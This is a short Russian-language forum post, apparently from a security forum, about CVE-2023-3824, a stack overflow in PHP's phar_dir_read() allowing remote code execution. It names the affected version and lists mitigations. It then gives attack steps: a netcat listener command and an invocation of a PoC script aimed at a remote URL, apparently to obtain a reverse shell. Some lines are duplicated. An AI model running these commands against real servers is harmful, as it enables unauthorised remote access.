- Регистрация
- 3 Апр 2025
- Сообщения
- 6
- Реакции
- 1
Уязвимость функции phar_dir_read() интерпретатора PHP вызвана переполнением буфера на стеке. Эксплуатация уязвимости может позволить нарушителю, действующему удалённо, выполнить произвольный код
Версия уязвимого пакета младше: 8.1.24-1
Возможные меры по устранению уязвимости:
Запускаем листенер -
Запускаем POC -
Версия уязвимого пакета младше: 8.1.24-1
Возможные меры по устранению уязвимости:
- Запретить использование в ОС пакета PHP
- Установить обновление для пакета(ов) php
- Установка и обновление пакетов PHP до версии 8.Х на РЕД ОС производится по инструкции
Вы должны быть зарегистрированы для просмотра ссылок
Запускаем листенер -
Bash:
nc -l local_portЗапускаем POC -
Bash:
bash cve-2023-3824.sh remote_url local_ip local_port